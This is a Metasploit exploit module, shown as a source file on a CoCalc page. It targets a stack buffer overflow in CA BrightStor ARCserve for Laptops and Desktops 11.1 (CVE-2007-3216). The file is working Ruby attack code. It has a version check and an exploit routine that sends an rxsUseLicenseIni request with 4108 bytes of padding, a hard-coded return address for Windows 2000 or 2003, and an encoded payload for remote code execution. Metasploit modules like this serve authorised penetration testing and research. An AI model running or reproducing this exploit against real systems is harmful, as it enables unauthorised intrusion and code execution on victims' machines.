Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup

18
          for Laptops & Desktops 11.1. By sending a specially crafted request (rxsUseLicenseIni), an

19
          attacker could overflow the buffer and execute arbitrary code.

20
        },

21
        'Author' => [ 'MC' ],

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          [ 'CVE', '2007-3216' ],

25
          [ 'OSVDB', '35329' ],

26
          [ 'BID', '24348' ],

27
        ],

28
        'Privileged' => true,

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'process',

31
        },

32
        'Payload' => {

33
          'Space' => 700,

34
          'BadChars' => "\x00",

35
          'StackAdjustment' => -3500,

36
        },

37
        'Platform' => 'win',

38
        'Targets' => [

39
          [ 'Windows 2003 SP0 English',	{ 'Ret' => 0x71ae1f9b } ],

40
          [ 'Windows 2000 SP4 English',	{ 'Ret' => 0x75031dce } ],

41
        ],

42
        'DisclosureDate' => '2007-06-06',

43
        'DefaultTarget' => 0,

44
        'Notes' => {

45
          'Reliability' => UNKNOWN_RELIABILITY,

46
          'Stability' => UNKNOWN_STABILITY,

47
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

48
        }

49
      )

50
    )

51


52
    register_options([ Opt::RPORT(1900) ])

53
  end

54


55
  def check

56
    connect

57


58
    sock.put("0000000019rxrGetServerVersion")

59
    ver = sock.get_once

60


61
    disconnect

62


63
    if (ver and ver =~ /11\.1\.742/)

64
      return Exploit::CheckCode::Appears

65
    end

66


67
    return Exploit::CheckCode::Safe

68
  end

69


70
  def exploit

71
    connect

72


73
    data = rand_text_alpha_upper(4108) + [target.ret].pack('V')

74
    data << payload.encoded + rand_text_alpha_upper(rand(300) + 1)

75


76
    sploit = "0000004820" # Command Length Field

77
    sploit << "rxsUseLicenseIni"   # RPC Command

78
    sploit << "~~"                 # Constant Argument Delimiter

79
    sploit << data

80


81
    print_status("Trying target #{target.name}...")

82
    # One-shot overwrite...

83
    sock.put(sploit)

84


85
    handler

86
    disconnect

87
  end

88
end

89


90